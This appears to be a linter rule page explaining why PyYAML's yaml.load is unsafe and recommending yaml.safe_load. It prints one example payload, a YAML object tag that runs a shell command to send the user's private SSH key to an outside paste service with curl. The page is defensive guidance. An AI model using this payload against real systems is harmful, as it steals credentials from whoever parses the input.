#YML100

Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider yaml.safe_load().

The Pyyaml library’s default loader will parse YAML like this:

!!python/object/apply:os.system ["cat ~/.ssh/id_rsa | curl -F 'sprunge=<-' http://sprunge.us"]

Using yaml.load against this input would execute local commands on the host shell

Deprecation in pyyaml 5.1

Newer versions of Pyyaml (5.1) will raise a warning, however many situations like web servers developers would not see this warning.

Example

import yaml
with open('cfg.yaml') as cfg:
    config = yaml.load(cfg)

Quick Fixes

• Plugin will recommend Safe Load Fixer.

See Also

• YAML Load Input Documentation